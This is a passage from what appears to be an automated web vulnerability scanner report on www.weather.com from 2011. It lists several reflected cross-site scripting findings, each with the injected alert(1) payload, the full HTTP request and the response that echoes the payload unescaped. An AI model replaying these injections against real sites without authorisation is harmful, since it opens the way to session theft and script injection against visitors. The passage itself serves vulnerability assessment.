The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1cb2"-alert(1)-"13022a50a91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelete1cb2"-alert(1)-"13022a50a91 /metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:24 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii3x02 X-Varnish: 624705097 Date: Thu, 24 Mar 2011 17:40:54 GMT Connection: keep-alive Content-Length: 159916 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... tch(/beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pagelete1cb2"-alert(1)-"13022a50a91 /metrics/", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011"...[SNIP]...
1.19. http://www.weather.com/pagelet/metrics/ [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/metrics/
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f9d"-alert(1)-"2fb1a1e8e87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet/metricsc2f9d"-alert(1)-"2fb1a1e8e87 /?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:45:59 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x02 X-Varnish: 1510934619 Date: Thu, 24 Mar 2011 17:40:59 GMT Connection: keep-alive Content-Length: 108349 <!DOCTYPE HTML> <html> <head> <title>Page Not Found</title> <link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">...[SNIP]... a/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "60990", pageURL: "/pagelet/metricsc2f9d"-alert(1)-"2fb1a1e8e87 /", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011", ...[SNIP]...
1.20. http://www.weather.com/pagelet/metrics/ [cb parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/metrics/
Issue detail
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 36fdf<script>alert(1)</script>1309f12375a was submitted in the cb parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet/metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics36fdf<script>alert(1)</script>1309f12375a HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:45:46 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x01 X-Varnish: 1097007573 Date: Thu, 24 Mar 2011 17:40:46 GMT Connection: keep-alive Content-Length: 326 YAHOO.metrics.createMetrics36fdf<script>alert(1)</script>1309f12375a ({level1:"HOMEPAGE", level2:"COMMON", level3:"", level4:"", level5:"", level6:"", contentType:"", detail:"", title:"", pagename:"/index.html", ad_category:"homepage", ad_family:"", ad_chann...[SNIP]...
1.21. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload 60e14><script>alert(1)</script>b10c9baf479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec9760e14><script>alert(1)</script>b10c9baf479 /bc/favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:42:04 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x06 X-Varnish: 1156449751 Date: Thu, 24 Mar 2011 17:41:34 GMT Connection: keep-alive Content-Length: 160090 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert("XSS")-"370523ec9760e14><script>alert(1)</script>b10c9baf479 /bc/favicon2.ico" />...[SNIP]...
1.22. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d3c1"-alert(1)-"8e5fb02f59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec975d3c1"-alert(1)-"8e5fb02f59 /bc/favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:42:08 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x06 X-Varnish: 2184735617 Date: Thu, 24 Mar 2011 17:41:38 GMT Connection: keep-alive Content-Length: 159983 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... "beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pagelet8cd82"-alert("XSS")-"370523ec975d3c1"-alert(1)-"8e5fb02f59 /bc/favicon2.ico", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/2...[SNIP]...
1.23. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acf42"><script>alert(1)</script>7682aafa52f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bcacf42"><script>alert(1)</script>7682aafa52f /favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:42:13 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii3x00 X-Varnish: 624720906 Date: Thu, 24 Mar 2011 17:41:43 GMT Connection: keep-alive Content-Length: 160117 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <a href="/weather/map/interactive/bcacf42"><script>alert(1)</script>7682aafa52f /favicon2.ico" from="nav_secondary" >...[SNIP]...
1.24. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 7d1ec><script>alert(1)</script>a55ddb85131 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc7d1ec><script>alert(1)</script>a55ddb85131 /favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:42:11 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x06 X-Varnish: 1510948709 Date: Thu, 24 Mar 2011 17:41:41 GMT Connection: keep-alive Content-Length: 160136 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert("XSS")-"370523ec97/bc7d1ec><script>alert(1)</script>a55ddb85131 /favicon2.ico" />...[SNIP]...
1.25. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 667fa"-alert(1)-"acc2bbdafe0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc667fa"-alert(1)-"acc2bbdafe0 /favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:42:18 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x01 X-Varnish: 1156454637 Date: Thu, 24 Mar 2011 17:41:48 GMT Connection: keep-alive Content-Length: 160042 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... ta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pagelet8cd82"-alert("XSS")-"370523ec97/bc667fa"-alert(1)-"acc2bbdafe0 /favicon2.ico", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2...[SNIP]...
1.26. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f2ca"-alert(1)-"67dc3956ab6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico4f2ca"-alert(1)-"67dc3956ab6 HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:43:46 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x06 X-Varnish: 2184767922 Date: Thu, 24 Mar 2011 17:43:16 GMT Connection: keep-alive Content-Length: 160046 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... tr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pagelet8cd82"-alert("XSS")-"370523ec97/bc/favicon2.ico4f2ca"-alert(1)-"67dc3956ab6 ", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011", ...[SNIP]...
1.27. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895a6"><script>alert(1)</script>4ee4cfc3b19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
